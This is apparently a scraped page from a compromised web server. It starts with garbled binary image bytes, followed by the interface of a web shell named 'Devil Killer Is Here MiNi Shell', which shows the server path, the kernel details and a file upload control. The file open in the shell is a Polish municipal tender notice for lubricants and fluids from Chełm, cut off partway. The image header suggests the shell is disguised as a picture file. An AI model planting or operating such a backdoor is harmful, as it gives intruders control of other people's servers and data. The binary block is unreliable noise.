JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250908/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250908/0041185501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sukcesywna dostawa materiałów eksploatacyjnych tj. olejów, smarów, płynów, itp. z podziałem na części </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIEJSKIE PRZEDSIĘBIORSTWO GOSPODARKI KOMUNALNEJ SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 110052871</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wołyńska 57</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chełm</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">82 563-14-61 do 63</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">82 563-04-50</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">mpgk@mpgkchelm.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://mpgkchelm.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Przedsiębiorstwo komunalne </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Usługi komunalne </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywna dostawa materiałów eksploatacyjnych tj. olejów, smarów, płynów, itp. z podziałem na części </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c2ba6b24-f974-479f-950b-c1c3e6bb889e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00411855</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-09-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://mpgk-chelm.logintrade.net/rejestracja/ustawowe.html <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu Platformy dostępnej pod adresem: https://mpgk-chelm.logintrade.net/rejestracja/ustawowe.html<br/>2. Zamawiający dopuszcza komunikację (za wyjątkiem oferty i dokumentów składanych wraz z ofertą, które powinny być złożone przez platformę zgodnie z Rozdziałem XIX SWZ) za pomocą poczty elektronicznej na adres e-mail: zamowienia@mpgkchelm.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Wymagania techniczne, jakim muszą odpowiadać urządzenia informatyczne Wykonawcy, aby mógł on korzystać z Platformy (szczegółowo zostały opisane na stornie: <br/>https://mpgkchelm.logintrade.net/reg,info,wymaganiatechniczne.html):<br/>a)dopuszczalne przeglądarki internetowe:<br/>­Internet Explorer 8, Internet Explorer 9, Internet Explorer 10, Internet Explorer 11,<br/>­Google Chrome 31<br/>­Mozilla Firefox 26<br/>­Opera 18<br/>b)pozostałe wymagania:<br/>­dostęp do sieci internet;<br/>­obsługa przez przeglądarkę protokołu XMLHttpRequest – ajax;<br/>­włączona obsługa JavaScript;<br/>­zalecana szybkość łącza internetowego powyżej 500 KB/s;<br/>­zainstalowany Acrobat Reader;<br/>­zainstalowane środowisko uruchomieniowe Java - Java SE Runtime Environment 6 Update 24 lub nowszy.<br/>2.Zamawiający wskazuje na format przesyłanych przez Wykonawcę środkiem komunikacji elektronicznej oświadczeń lub dokumentów: .pdf. Jednak Wykonawca może przygotować oświadczenia lub dokumenty w każdym innym formacie określonym treścią Rozporządzenie Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452).<br/>3.Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów i informacji przy użyciu Platformy opisane zostały w instrukcjach zawartych w zakładce „Instrukcje” dostępnej na Platformie.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje z zakresu RODO ujęto w Rozdziale XXVIII SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacje z zakresu RODO ujęto w Rozdziale XXVIII SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP/25/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest sukcesywna dostawa olejów zgodnych z opisem przedmiotu zamówienia i ilościami zawartymi w załączniku nr 2a do SWZ,<br/>2. Zamawiający dopuszcza możliwość wzajemnej zamiany ilościowej w ramach wymienionego w załączniku nr 2a do SWZ asortymentu, do wartości złożonej przez Wykonawcę oferty.<br/>3. Zamawiający zastrzega sobie prawo składania zamówień i realizacji przedmiotu zamówienia w zależności od potrzeb, tym samym ma prawo ograniczania ilości przedmiotu zamówienia, co może spowodować zmniejszenie wartości dostaw.<br/>4. Zamawiający gwarantuje, że minimalna wartość przedmiotu umowy wyniesie 70% całkowitego wynagrodzenia, określonego w umowie.<br/>5. Wykonawca powinien mieć możliwość realizacji dostaw bezpośrednio po zawarciu umowy.<br/>6. Wykonawca zobowiązany jest wskazać w załącznikach nr 2a do SWZ nazwę producenta każdego oferowanego produktu.<br/>7. Oferta powinna uwzględniać wycenę wszystkich usług towarzyszących, związanych pośrednio <br/>z wykonywanymi dostawami tj. w szczególności:<br/>a) realizowanie dostaw w dni robocze w godzinach od 7:00 do 14:00 pojazdem wyposażonym w windę rozładunkową, na koszt i ryzyko Wykonawcy do magazynu Zamawiającego, mieszczącego się przy <br/>ul. Bieławin 5 w Chełmie;<br/>b) rozładowanie i ustawienie zamówionego asortyment w miejscu wskazanym przez obsługę magazynu Zamawiającego;<br/>c) nieodpłatne udostępnienie wszelkich niezbędnych pojemników (bez kosztów udostępnienia), w których dostarczane będą materiały stanowiące przedmiot postępowania oraz odbiór na własny koszt pojemników zwrotnych. W przypadku wady opakowania wymienienie ich na nieuszkodzone na własny koszt;<br/>d) dostarczenie wraz z pierwszą dostawą karty charakterystyki wszystkich produktów wskazanych w załącznikach nr 2a do SWZ, systematyczne aktualizowanie (w przypadku zmian lub dezaktualizacji). Zamawiający dopuszcza wersję elektroniczną dla kart charakterystyki.<br/>8. Wszystkie materiały eksploatacyjne wymienione w ofercie Wykonawcy powinny być dopuszczone do obrotu <br/>i powszechnego stosowania zgodnie z obowiązującymi przepisami na terenie Rzeczypospolitej Polskiej.<br/>9. Zasady zamawiania, rozliczania i płatności zawiera załącznik nr 4 do SWZ – projektowane postanowienia umowy.<br/>10. Zamawiający dopuszcza zastosowanie rozwiązań równoważnych. Przez rozwiązania równoważne Zamawiający rozumie dostarczenie produktów o parametrach tożsamych z parametrami jakościowymi produktów stanowiących przedmiot niniejszego zamówienia (równoważny skład chemiczny oraz właściwości fizyczne takie same jak produkty wskazane przez Zamawiającego w załącznikach nr 2a do SWZ).<br/>10.1. W przypadku gdy Wykonawca zaoferuje rozwiązania równoważne wówczas stosowanie do treści art. 101 ust. 6 pzp zobowiązany jest udowodnić w ofercie, w szczególności za pomocą przedmiotowych środków dowodowych, o których mowa w rozdziale V SWZ, że proponowane rozwiązania w równoważnym stopniu spełniają wszystkie parametry jakościowe określone przez Zamawiającego w załącznikach nr 2a do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09211000-1 - Oleje smarowe i środki smarowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Zamawiający za najkorzystniejszą w zakresie danej części uzna ofertę, która będzie miała najniższą cenę.<br/>2.Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>3.Jeżeli, nie można dokonać wyboru najkorzystniejszej oferty ze względu na to, że zostały złożone oferty w zakresie danej części o takiej samej cenie, Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.<br/>4.Wykonawcy, składając oferty dodatkowe, nie mogą oferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.<br/>5.W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych ofert lub innych składanych dokumentów lub oświadczeń zgodnie z art. 223 ust. 1 pzp. Wykonawcy są zobowiązani do przedstawienia wyjaśnień w terminie wskazanym przez Zamawiającego.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Wg kolejności</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.7.) Kolejność kryterium: <span class="normal">1</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest sukcesywna dostawa smarów zgodnych z opisem przedmiotu zamówienia i ilościami zawartymi w załączniku nr 2b do SWZ,<br/>2. Zamawiający dopuszcza możliwość wzajemnej zamiany ilościowej w ramach wymienionego w załączniku nr 2b do SWZ asortymentu, do wartości złożonej przez Wykonawcę oferty.<br/>3. Zamawiający zastrzega sobie prawo składania zamówień i realizacji przedmiotu zamówienia w zależności od potrzeb, tym samym ma prawo ograniczania ilości przedmiotu zamówienia, co może spowodować zmniejszenie wartości dostaw.<br/>4. Zamawiający gwarantuje, że minimalna wartość przedmiotu umowy wyniesie 70% całkowitego wynagrodzenia, określonego w umowie.<br/>5. Wykonawca powinien mieć możliwość realizacji dostaw bezpośrednio po zawarciu umowy.<br/>6. Wykonawca zobowiązany jest wskazać w załącznikach nr 2b do SWZ nazwę producenta każdego oferowanego produktu.<br/>7. Oferta powinna uwzględniać wycenę wszystkich usług towarzyszących, związanych pośrednio <br/>z wykonywanymi dostawami tj. w szczególności:<br/>a) realizowanie dostaw w dni robocze w godzinach od 7:00 do 14:00 pojazdem wyposażonym w windę rozładunkową, na koszt i ryzyko Wykonawcy do magazynu Zamawiającego, mieszczącego się przy <br/>ul. Bieławin 5 w Chełmie;<br/>b) rozładowanie i ustawienie zamówionego asortyment w miejscu wskazanym przez obsługę magazynu Zamawiającego;<br/>c) nieodpłatne udostępnienie wszelkich niezbędnych pojemników (bez kosztów udostępnienia), w których dostarczane będą materiały stanowiące przedmiot postępowania oraz odbiór na własny koszt pojemników zwrotnych. W przypadku wady opakowania wymienienie ich na nieuszkodzone na własny koszt;<br/>d) dostarczenie wraz z pierwszą dostawą karty charakterystyki wszystkich produktów wskazanych w załącznikach nr 2b do SWZ, systematyczne aktualizowanie (w przypadku zmian lub dezaktualizacji). Zamawiający dopuszcza wersję elektroniczną dla kart charakterystyki.<br/>8. Wszystkie materiały eksploatacyjne wymienione w ofercie Wykonawcy powinny być dopuszczone do obrotu <br/>i powszechnego stosowania zgodnie z obowiązującymi przepisami na terenie Rzeczypospolitej Polskiej.<br/>9. Zasady zamawiania, rozliczania i płatności zawiera załącznik nr 4 do SWZ – projektowane postanowienia umowy.<br/>10. Zamawiający dopuszcza zastosowanie rozwiązań równoważnych. Przez rozwiązania równoważne Zamawiający rozumie dostarczenie produktów o parametrach tożsamych z parametrami jakościowymi produktów stanowiących przedmiot niniejszego zamówienia (równoważny skład chemiczny oraz właściwości fizyczne takie same jak produkty wskazane przez Zamawiającego w załącznikach nr 2b do SWZ).<br/>10.1. W przypadku gdy Wykonawca zaoferuje rozwiązania równoważne wówczas stosowanie do treści art. 101 ust. 6 pzp zobowiązany jest udowo </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09211000-1 - Oleje smarowe i środki smarowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Zamawiający za najkorzystniejszą uzna ofertę, która będzie miała najniższą cenę w zakresie danej części.<br/>2.Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>3.Jeżeli, nie można dokonać wyboru najkorzystniejszej oferty, ze względu na to, że dwie lub więcej ofert w zakresie danej części, przedstawia taką samą cenę, Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.<br/>4.Wykonawcy, składając oferty dodatkowe, nie mogą oferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.<br/>5.W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych ofert lub innych składanych dokumentów lub oświadczeń zgodnie z art. 223 ust. 1 pzp. Wykonawcy są zobowiązani do przedstawienia wyjaśnień w terminie wskazanym przez Zamawiającego.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Wg kolejności</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.7.) Kolejność kryterium: <span class="normal">1</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest sukcesywna dostawa płynów i pozostałych zgodnych z opisem przedmiotu zamówienia i ilościami zawartymi w załączniku nr 2c do SWZ,<br/>2. Zamawiający dopuszcza możliwość wzajemnej zamiany ilościowej w ramach wymienionego w załączniku nr 2c do SWZ asortymentu, do wartości złożonej przez Wykonawcę oferty.<br/>3. Zamawiający zastrzega sobie prawo składania zamówień i realizacji przedmiotu zamówienia w zależności od potrzeb, tym samym ma prawo ograniczania ilości przedmiotu zamówienia, co może spowodować zmniejszenie wartości dostaw.<br/>4. Zamawiający gwarantuje, że minimalna wartość przedmiotu umowy wyniesie 70% całkowitego wynagrodzenia, określonego w umowie.<br/>5. Wykonawca powinien mieć możliwość realizacji dostaw bezpośrednio po zawarciu umowy.<br/>6. Wykonawca zobowiązany jest wskazać w załącznikach nr 2c do SWZ nazwę producenta każdego oferowanego produktu.<br/>7. Oferta powinna uwzględniać wycenę wszystkich usług towarzyszących, związanych pośrednio <br/>z wykonywanymi dostawami tj. w szczególności:<br/>a) realizowanie dostaw w dni robocze w godzinach od 7:00 do 14:00 pojazdem wyposażonym w windę rozładunkową, na koszt i ryzyko Wykonawcy do magazynu Zamawiającego, mieszczącego się przy <br/>ul. Bieławin 5 w Chełmie;<br/>b) rozładowanie i ustawienie zamówionego asortyment w miejscu wskazanym przez obsługę magazynu Zamawiającego;<br/>c) nieodpłatne udostępnienie wszelkich niezbędnych pojemników (bez kosztów udostępnienia), w których dostarczane będą materiały stanowiące przedmiot postępowania oraz odbiór na własny koszt pojemników zwrotnych. W przypadku wady opakowania wymienienie ich na nieuszkodzone na własny koszt;<br/>d) dostarczenie wraz z pierwszą dostawą karty charakterystyki wszystkich produktów wskazanych w załącznikach nr 2c do SWZ, systematyczne aktualizowanie (w przypadku zmian lub dezaktualizacji). Zamawiający dopuszcza wersję elektroniczną dla kart charakterystyki.<br/>8. Wszystkie materiały eksploatacyjne wymienione w ofercie Wykonawcy powinny być dopuszczone do obrotu <br/>i powszechnego stosowania zgodnie z obowiązującymi przepisami na terenie Rzeczypospolitej Polskiej.<br/>9. Zasady zamawiania, rozliczania i płatności zawiera załącznik nr 4 do SWZ – projektowane postanowienia umowy.<br/>10. Zamawiający dopuszcza zastosowanie rozwiązań równoważnych. Przez rozwiązania równoważne Zamawiający rozumie dostarczenie produktów o parametrach tożsamych z parametrami jakościowymi produktów stanowiących przedmiot niniejszego zamówienia (równoważny skład chemiczny oraz właściwości fizyczne takie same jak produkty wskazane przez Zamawiającego w załącznikach nr 2c do SWZ).<br/>10.1. W przypadku gdy Wykonawca zaoferuje rozwiązania równoważne wówczas stosowanie do treści art. 101 ust. 6 pzp zobowiązany jest udowo </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39831500-1 - Samochodowe środki czyszczące</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.Zamawiający za najkorzystniejszą uzna ofertę, która będzie miała najniższą cenę w zakresie danej części.<br/>2.Ocenie będą podlegać wyłącznie oferty nie podlegające odrzuceniu.<br/>3.Jeżeli, nie można dokonać wyboru najkorzystniejszej oferty, ze względu na to, że dwie lub więcej ofert w zakresie danej części, przedstawia taką samą cenę, Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.<br/>4.Wykonawcy, składając oferty dodatkowe, nie mogą oferować cen wyższych niż zaoferowane w uprzednio złożonych przez nich ofertach.<br/>5.W toku badania i oceny ofert Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści złożonych ofert lub innych składanych dokumentów lub oświadczeń zgodnie z art. 223 ust. 1 pzp. Wykonawcy są zobowiązani do przedstawienia wyjaśnień w terminie wskazanym przez Zamawiającego.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Wg kolejności</span></h3> <h3 